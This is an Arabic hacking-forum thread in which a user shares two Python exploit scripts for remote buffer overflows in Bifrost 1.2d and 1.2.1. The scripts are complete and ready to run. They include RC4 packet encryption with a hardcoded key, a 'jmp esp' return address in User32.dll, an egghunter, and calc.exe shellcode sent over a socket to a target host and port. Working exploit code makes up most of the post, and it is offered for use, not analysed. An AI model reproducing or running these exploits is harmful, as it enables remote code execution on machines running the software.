التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام


قديم 07-04-2013, 06:48 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
إحصائية العضو







OSAMA ABABNEH غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
OSAMA ABABNEH is on a distinguished road

افتراضي ثغره بافر اوفر اوفلو في بيفروست1.2.1&1.2d


السلام عليكم
اليوم جبتلكم ثغره في برنامج بفروست 1.2.1 و 1.2d
ثغره 1.2d


كود:
###########################  # Bifrost 1.2d - Remote Buffer Overflow  ###########################  #!/usr/bin/python2.7 #By : Mohamed Clay import socket from time import sleep from itertools import izip, cycle import base64 import threading import sys   def rc4crypt(data, key):     x = 0     box = range(256)     for i in range(256):         x = (x + box[i] + ord(key[i % len(key)])) % 256         box[i], box[x] = box[x], box[i]     x = 0     y = 0     out = []     for char in data:         x = (x + 1) % 256         y = (y + box[x]) % 256         box[x], box[y] = box[y], box[x]         out.append(chr(ord(char) ^ box[(box[x] + box[y]) % 256]))           return ''.join(out)   def bif_len(s):     while len(s)<8:          s=s+"00"     return s   def header(s):       a=(s[0]+s[1]).decode("hex")       a+=(s[2]+s[3]).decode("hex")       a+=(s[4]+s[5]).decode("hex")       a+=(s[5]+s[6]).decode("hex")       return a   def random():         a=""     for i in range(0,8):         a+="A"*1000+"|"     return a     def exploit():     s.sendall(out)   def usage():      print "\n\n\t***************************"    print "\t*    By : Mohamed Clay    *"    print "\t*  Bifrost 1.2d Exploit  *"    print "\t***************************\n"    print "\t  Usage : ./bifrost1.2.1 host port"    print "\tExample : ./bifrost1.2.1 192.168.1.10 81\n\n"     if len(sys.argv)!=3:     usage()     exit()   HOST=sys.argv[1] PORT=int(sys.argv[2])   key="\xA3\x78\x26\x35\x57\x32\x2D\x60\xB4\x3C\x2A\x5E\x33\x34\x72\x00"   xor="\xB2\x9C\x51\xBB" # we need this in order to bypass 0046A03E function eip="\x53\x93\x3A\x7E" # jmp esp User32.dll   egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8\x77\x30\x30\x74\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7";   #calc.exe shellcode (badchars "\x00")   buf ="\xb8\x75\xd3\x5c\x87\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9" buf +="\xb1\x33\x31\x43\x12\x83\xeb\xfc\x03\x36\xdd\xbe\x72\x44" buf +="\x09\xb7\x7d\xb4\xca\xa8\xf4\x51\xfb\xfa\x63\x12\xae\xca" buf +="\xe0\x76\x43\xa0\xa5\x62\xd0\xc4\x61\x85\x51\x62\x54\xa8" buf +="\x62\x42\x58\x66\xa0\xc4\x24\x74\xf5\x26\x14\xb7\x08\x26" buf +="\x51\xa5\xe3\x7a\x0a\xa2\x56\x6b\x3f\xf6\x6a\x8a\xef\x7d" buf +="\xd2\xf4\x8a\x41\xa7\x4e\x94\x91\x18\xc4\xde\x09\x12\x82" buf +="\xfe\x28\xf7\xd0\xc3\x63\x7c\x22\xb7\x72\x54\x7a\x38\x45" buf +="\x98\xd1\x07\x6a\x15\x2b\x4f\x4c\xc6\x5e\xbb\xaf\x7b\x59" buf +="\x78\xd2\xa7\xec\x9d\x74\x23\x56\x46\x85\xe0\x01\x0d\x89" buf +="\x4d\x45\x49\x8d\x50\x8a\xe1\xa9\xd9\x2d\x26\x38\x99\x09" buf +="\xe2\x61\x79\x33\xb3\xcf\x2c\x4c\xa3\xb7\x91\xe8\xaf\x55" buf +="\xc5\x8b\xed\x33\x18\x19\x88\x7a\x1a\x21\x93\x2c\x73\x10" buf +="\x18\xa3\x04\xad\xcb\x80\xfb\xe7\x56\xa0\x93\xa1\x02\xf1" buf +="\xf9\x51\xf9\x35\x04\xd2\x08\xc5\xf3\xca\x78\xc0\xb8\x4c" buf +="\x90\xb8\xd1\x38\x96\x6f\xd1\x68\xf5\xee\x41\xf0\xd4\x95" buf +="\xe1\x93\x28"     raw=(1000-533-len(egghunter))*"\x90" raw2=(1000-8-len(buf))*"\x41"+"|" command=30     tmp=hex(command).split("0x")[1] data=tmp.decode("hex")+"F"*2+" "*511+xor+"C"*12+eip+"A"*8+egghunter+raw+"|"+" "*1000+"|"+"w00tw00t"+buf+raw2+random() out=rc4crypt(data,key) l=header(bif_len(str(hex(len(data))).split("0x")[1])) out=l+out     data2="2192.168.1.1|Default|Mohamed Clay|Mohamed Clay|p1.2d||0|-1|0|0000|0|1|0|0|000000|C:\|C:\|C:\|MA|00000000|BifrosT v1.2d|" out2=rc4crypt(data2,key) l=header(bif_len(str(hex(len(data2))).split("0x")[1])) out2=l+out2   th = threading.Thread(name='exploit', target=exploit) th.setDaemon(True) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((HOST, PORT)) s.sendall(out2) th.start() s.recv(1024) print "\n[*] By : Mohamed Clay" print "[*] Exploit completed\n"  ###########################
ثغره 1.2.1


كود:
###########################  # Bifrost 1.2.1 - Remote Buffer OverFlow  ###########################  #!/usr/bin/python2.7 #By : Mohamed Clay import socket from time import sleep from itertools import izip, cycle import base64 import sys   def rc4crypt(data, key):     x = 0     box = range(256)     for i in range(256):         x = (x + box[i] + ord(key[i % len(key)])) % 256         box[i], box[x] = box[x], box[i]     x = 0     y = 0     out = []     for char in data:         x = (x + 1) % 256         y = (y + box[x]) % 256         box[x], box[y] = box[y], box[x]         out.append(chr(ord(char) ^ box[(box[x] + box[y]) % 256]))           return ''.join(out)   def bif_len(s):     while len(s)<8:          s=s+"00"     return s   def header(s):       a=(s[0]+s[1]).decode("hex")       a+=(s[2]+s[3]).decode("hex")       a+=(s[4]+s[5]).decode("hex")       a+=(s[5]+s[6]).decode("hex")       return a   def random():         a=""     for i in range(0,8):         a+="A"*1000+"|"     return a   def usage():      print "\n\n\t***************************"    print "\t*    By : Mohamed Clay    *"    print "\t*  Bifrost 1.2.1 Exploit  *"    print "\t***************************\n"    print "\t  Usage : ./bifrost1.2.1 host port"    print "\tExample : ./bifrost1.2.1 192.168.1.10 81\n\n"     if len(sys.argv)!=3:     usage()     exit()   HOST=sys.argv[1] PORT=int(sys.argv[2])   key="\xA3\x78\x26\x35\x57\x32\x2D\x60\xB4\x3C\x2A\x5E\x33\x34\x72\x00"   xor="\xB2\x9C\x51\xBB" # we need this in order to bypass 0046A03E function eip="\x53\x93\x3A\x7E" # jmp esp User32.dll   egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8\x77\x30\x30\x74\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7";   #calc.exe shellcode (badchars "\x00")   buf ="\xb8\x75\xd3\x5c\x87\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9" buf +="\xb1\x33\x31\x43\x12\x83\xeb\xfc\x03\x36\xdd\xbe\x72\x44" buf +="\x09\xb7\x7d\xb4\xca\xa8\xf4\x51\xfb\xfa\x63\x12\xae\xca" buf +="\xe0\x76\x43\xa0\xa5\x62\xd0\xc4\x61\x85\x51\x62\x54\xa8" buf +="\x62\x42\x58\x66\xa0\xc4\x24\x74\xf5\x26\x14\xb7\x08\x26" buf +="\x51\xa5\xe3\x7a\x0a\xa2\x56\x6b\x3f\xf6\x6a\x8a\xef\x7d" buf +="\xd2\xf4\x8a\x41\xa7\x4e\x94\x91\x18\xc4\xde\x09\x12\x82" buf +="\xfe\x28\xf7\xd0\xc3\x63\x7c\x22\xb7\x72\x54\x7a\x38\x45" buf +="\x98\xd1\x07\x6a\x15\x2b\x4f\x4c\xc6\x5e\xbb\xaf\x7b\x59" buf +="\x78\xd2\xa7\xec\x9d\x74\x23\x56\x46\x85\xe0\x01\x0d\x89" buf +="\x4d\x45\x49\x8d\x50\x8a\xe1\xa9\xd9\x2d\x26\x38\x99\x09" buf +="\xe2\x61\x79\x33\xb3\xcf\x2c\x4c\xa3\xb7\x91\xe8\xaf\x55" buf +="\xc5\x8b\xed\x33\x18\x19\x88\x7a\x1a\x21\x93\x2c\x73\x10" buf +="\x18\xa3\x04\xad\xcb\x80\xfb\xe7\x56\xa0\x93\xa1\x02\xf1" buf +="\xf9\x51\xf9\x35\x04\xd2\x08\xc5\xf3\xca\x78\xc0\xb8\x4c" buf +="\x90\xb8\xd1\x38\x96\x6f\xd1\x68\xf5\xee\x41\xf0\xd4\x95" buf +="\xe1\x93\x28"     raw=(1000-533-len(egghunter))*"\x90" raw2=(1000-8-len(buf))*"\x41"+"|" command=30   tmp=hex(command).split("0x")[1] data=tmp.decode("hex")+"F"*2+" "*511+xor+"C"*8+eip+"A"*12+egghunter+raw+"|"+" "*1000+"|"+"w00tw00t"+buf+raw2+random() out=rc4crypt(data,key) l=header(bif_len(str(hex(len(data))).split("0x")[1])) out=l+out s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((HOST, PORT)) s.sendall(out) print "\n[*] By : Mohamed Clay" print "[*] Exploit completed\n"  ###########################
good hack


eyvi fhtv h,tv h,tg, td fdtv,sj1>2>1&1>2d

التوقيع

ارفع راسك فوق انت اردني

 

   

رد مع اقتباس
قديم 08-13-2015, 06:14 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
الصورة الرمزية kam17
 

 

 
إحصائية العضو






kam17 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
kam17 is on a distinguished road

افتراضي رد: ثغره بافر اوفر اوفلو في بيفروست1.2.1&1.2d


good

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)

أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 06:14 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0